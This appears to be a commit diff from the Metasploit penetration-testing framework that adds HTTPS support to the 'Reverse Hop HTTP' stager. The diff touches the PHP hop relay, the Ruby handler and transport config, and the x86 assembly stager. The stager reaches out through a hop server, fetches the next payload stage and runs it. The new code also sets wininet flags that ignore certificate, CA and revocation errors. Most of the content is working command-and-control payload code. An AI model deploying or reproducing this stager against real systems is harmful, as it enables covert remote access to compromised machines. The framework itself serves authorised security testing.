Land #6227, reverse_hop_http updates and HTTPS unification
commit
5654b6b2e2
|
@ -45,7 +45,7 @@ if($url === "/control"){
|
|||
//get data
|
||||
$postdata = file_get_contents("php://input");
|
||||
//See if we should send anything down
|
||||
if($postdata === "RECV\x00"){
|
||||
if($postdata === "RECV\x00" || $postdata === "RECV"){
|
||||
findSendDelete($tempdir, "down_" . sha1($url));
|
||||
$fname = $tempdir . "/up_recv_" . sha1($url); //Only keep one RECV poll
|
||||
}else{
|
||||
|
|
|
@ -82,7 +82,8 @@ module ReverseHopHttp
|
|||
uri.port,
|
||||
{
|
||||
'Msf' => framework
|
||||
}
|
||||
},
|
||||
full_uri.start_with?('https')
|
||||
)
|
||||
@running = true # So we know we can stop it
|
||||
# If someone is already monitoring this hop, bump the refcount instead of starting a new thread
|
||||
|
@ -185,6 +186,19 @@ module ReverseHopHttp
|
|||
lock.unlock
|
||||
end
|
||||
|
||||
#
|
||||
# Implemented for compatibility reasons
|
||||
#
|
||||
def resources
|
||||
handlers
|
||||
end
|
||||
|
||||
#
|
||||
# Implemented for compatibility reasons, does nothing
|
||||
#
|
||||
def deref
|
||||
end
|
||||
|
||||
#
|
||||
# Implemented for compatibility reasons, does nothing
|
||||
#
|
||||
|
@ -250,7 +264,7 @@ module ReverseHopHttp
|
|||
#
|
||||
def send_new_stage(uri)
|
||||
# try to get the UUID out of the existing URI
|
||||
info = process_uri_resource(uri)
|
||||
info = process_uri_resource(uri.to_s)
|
||||
uuid = info[:uuid] || Msf::Payload::UUID.new
|
||||
|
||||
# generate a new connect
|
||||
|
@ -258,11 +272,14 @@ module ReverseHopHttp
|
|||
conn_id = generate_uri_uuid(sum, uuid)
|
||||
conn_id = conn_id[1..-1] if conn_id.start_with? '/'
|
||||
url = full_uri + conn_id + "/\x00"
|
||||
fulluri = URI(full_uri + conn_id)
|
||||
|
||||
print_status("Preparing stage for next session #{conn_id}")
|
||||
blob = stage_payload(
|
||||
uuid: uuid,
|
||||
uri: conn_id
|
||||
uri: fulluri.request_uri,
|
||||
lhost: uri.host,
|
||||
lport: uri.port
|
||||
)
|
||||
|
||||
#send up
|
||||
|
|
|
@ -55,8 +55,8 @@ module Msf::Payload::TransportConfig
|
|||
|
||||
{
|
||||
:scheme => 'http',
|
||||
:lhost => opts[:lhost],
|
||||
:lport => opts[:lport].to_i,
|
||||
:lhost => opts[:lhost] || datastore['LHOST'],
|
||||
:lport => opts[:lport].to_i || datastore['LPORT'].to_i,
|
||||
:uri => uri,
|
||||
:comm_timeout => datastore['SessionCommunicationTimeout'].to_i,
|
||||
:retry_total => datastore['SessionRetryTotal'].to_i,
|
||||
|
|
|
@ -16,13 +16,14 @@ module Metasploit3
|
|||
|
||||
def initialize(info = {})
|
||||
super(merge_info(info,
|
||||
'Name' => 'Reverse Hop HTTP Stager',
|
||||
'Name' => 'Reverse Hop HTTP/HTTPS Stager',
|
||||
'Description' => %q{
|
||||
Tunnel communication over an HTTP hop point. Note that you must first upload
|
||||
Tunnel communication over an HTTP or HTTPS hop point. Note that you must first upload
|
||||
data/hop/hop.php to the PHP server you wish to use as a hop.
|
||||
},
|
||||
'Author' => [
|
||||
'scriptjunkie <scriptjunkie[at]scriptjunkie.us>',
|
||||
'bannedit',
|
||||
'hdm'
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
|
@ -48,6 +49,15 @@ module Metasploit3
|
|||
false
|
||||
end
|
||||
|
||||
#
|
||||
# Generate the transport-specific configuration
|
||||
#
|
||||
def transport_config(opts={})
|
||||
config = transport_config_reverse_http(opts)
|
||||
config[:scheme] = URI(datastore['HOPURL']).scheme
|
||||
config
|
||||
end
|
||||
|
||||
#
|
||||
# Generate the first stage
|
||||
#
|
||||
|
@ -188,12 +198,24 @@ httpopenrequest:
|
|||
pop ecx
|
||||
xor edx, edx ; NULL
|
||||
push edx ; dwContext (NULL)
|
||||
push (0x80000000 | 0x04000000 | 0x00200000 | 0x00000200 | 0x00400000) ; dwFlags
|
||||
;0x80000000 | ; INTERNET_FLAG_RELOAD
|
||||
;0x04000000 | ; INTERNET_NO_CACHE_WRITE
|
||||
;0x00200000 | ; INTERNET_FLAG_NO_AUTO_REDIRECT
|
||||
;0x00000200 | ; INTERNET_FLAG_NO_UI
|
||||
;0x00400000 ; INTERNET_FLAG_KEEP_CONNECTION
|
||||
EOS
|
||||
|
||||
if uri.scheme == 'http'
|
||||
payload_data << ' push (0x80000000 | 0x04000000 | 0x00200000 | 0x00000200 | 0x00400000) ; dwFlags'
|
||||
else
|
||||
payload_data << ' push (0x80000000 | 0x00800000 | 0x00001000 | 0x00002000 | 0x04000000 | 0x00200000 | 0x00000200 | 0x00400000) ; dwFlags'
|
||||
end
|
||||
# 0x80000000 | ; INTERNET_FLAG_RELOAD
|
||||
# 0x00800000 | ; INTERNET_FLAG_SECURE
|
||||
# 0x00001000 | ; INTERNET_FLAG_IGNORE_CERT_CN_INVALID
|
||||
# 0x00002000 | ; INTERNET_FLAG_IGNORE_CERT_DATE_INVALID
|
||||
# 0x80000000 | ; INTERNET_FLAG_RELOAD
|
||||
# 0x04000000 | ; INTERNET_NO_CACHE_WRITE
|
||||
# 0x00200000 | ; INTERNET_FLAG_NO_AUTO_REDIRECT
|
||||
# 0x00000200 | ; INTERNET_FLAG_NO_UI
|
||||
# 0x00400000 ; INTERNET_FLAG_KEEP_CONNECTION
|
||||
payload_data << <<EOS
|
||||
|
||||
push edx ; accept types
|
||||
push edx ; referrer
|
||||
push edx ; version
|
||||
|
@ -223,6 +245,28 @@ httpsendrequest:
|
|||
try_it_again:
|
||||
dec ebx
|
||||
jz failure
|
||||
|
||||
EOS
|
||||
if uri.scheme == 'https'
|
||||
payload_data << <<EOS
|
||||
set_security_options:
|
||||
push 0x00003380
|
||||
;0x00002000 | ; SECURITY_FLAG_IGNORE_CERT_DATE_INVALID
|
||||
;0x00001000 | ; SECURITY_FLAG_IGNORE_CERT_CN_INVALID
|
||||
;0x00000200 | ; SECURITY_FLAG_IGNORE_WRONG_USAGE
|
||||
;0x00000100 | ; SECURITY_FLAG_IGNORE_UNKNOWN_CA
|
||||
;0x00000080 ; SECURITY_FLAG_IGNORE_REVOCATION
|
||||
mov eax, esp
|
||||
push 0x04 ; sizeof(dwFlags)
|
||||
push eax ; &dwFlags
|
||||
push 0x1f ; DWORD dwOption (INTERNET_OPTION_SECURITY_FLAGS)
|
||||
push esi ; hRequest
|
||||
push 0x869E4675 ; hash( "wininet.dll", "InternetSetOptionA" )
|
||||
call ebp
|
||||
|
||||
EOS
|
||||
end
|
||||
payload_data << <<EOS
|
||||
jmp.i8 httpsendrequest
|
||||
|
||||
dbl_get_server_host:
|
||||
|
|
Loading…
Reference in New Issue